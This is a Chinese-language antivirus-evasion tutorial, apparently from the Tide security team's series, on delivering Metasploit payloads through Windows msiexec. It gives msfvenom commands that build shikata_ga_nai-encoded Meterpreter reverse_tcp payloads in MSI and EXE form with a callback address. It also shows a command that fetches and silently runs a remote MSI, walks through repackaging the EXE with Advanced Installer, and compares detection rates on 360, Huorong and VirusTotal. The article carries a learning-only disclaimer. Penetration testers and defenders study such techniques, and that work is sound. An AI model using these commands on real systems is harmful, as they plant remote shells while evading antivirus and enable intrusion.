2020-02-18 12:30:00 Author: mp.weixin.qq.com(查看原文) 阅读量:70 收藏
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus
几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。
看到msiexec可能还有点陌生,但说道.msi可能就比较熟悉了,在windows下很多软件安装就是.msi格式的。当Windows操作系统安装了Windows Installer引擎,而MSI软件包使用该引擎来安装应用程序,解释包和安装产品的可执行程序就是我们这用到 的Msiexec.exe。
之前在介绍免杀工具的时候有些工具就可以生成msi格式的payload,比如专题6介绍的venom:https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ,其实msfvenom也可以生成msi格式的payload,不过被杀软查杀的比较厉害了。
msi文件可以双击执行,也可以命令行静默执行,而且msiexec也同样支持远程下载功能,将msi文件上传到服务器,通过如下命令远程执行:
msiexec /q /i http://www.tidesec.com/shell/shell.msi我先用msfvenom生成一个原生态的msi文件看一下
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.211.55.2 lport=3333 -e x86/shikata_ga_nai -i 15 -b '\x00' -f msi -o test.msi在测试机器上执行,可以双击进行安装,也可以使用命令行静默执行。
msiexec /q /i test.msi不出意料,静态和动态查杀都没过。
virustotal.com上查杀率27/60个,还算不错呢。
Advanced Installer是一款功能强大、可生成符合MS Windows认证的Windows Installer的MSI 安装包制作工具,具有友好的图形用户界面,直观而且非常简单的界面,是一款很好的 Windows Installer 编写工具。
绿色版下载http://www.pc6.com/softview/SoftView_13165.html
先用msf生成一个exe格式的apyload
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.211.55.2 lport=3333 -e x86/shikata_ga_nai -i 15 -b '\x00' -f exe -o shell.exe打开Advanced Installer,创建一个项目
在项目中选择自定义操作,然后附加shell文件
选择构建,开始生成msi文件。
静默执行msiexec /q /i "Your Application.msi"
无法过360和火绒。
virustotal.com上Your Application.msi查杀率为29/58,略惨,还不如msf直接生成的。
virustotal.com上shell.exe查杀率为54/70,也就是说利用Advanced Installer打包后有15个杀软不会报病毒了,这点来看还算可以的。
虽然查杀率有些高,但这种思路还是不错的,这种工具网上有很多,可以找一些小众的试一下。
使用msiexec.exe绕过应用程序白名单(多种方法):https://www.cnblogs.com/backlion/p/10493910.html
渗透测试中的msiexec:https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84msiexec/
E
N
D
guān
关
zhù
注
wǒ
我
men
们
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。
想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:
如有侵权请联系:admin#unsafe.sh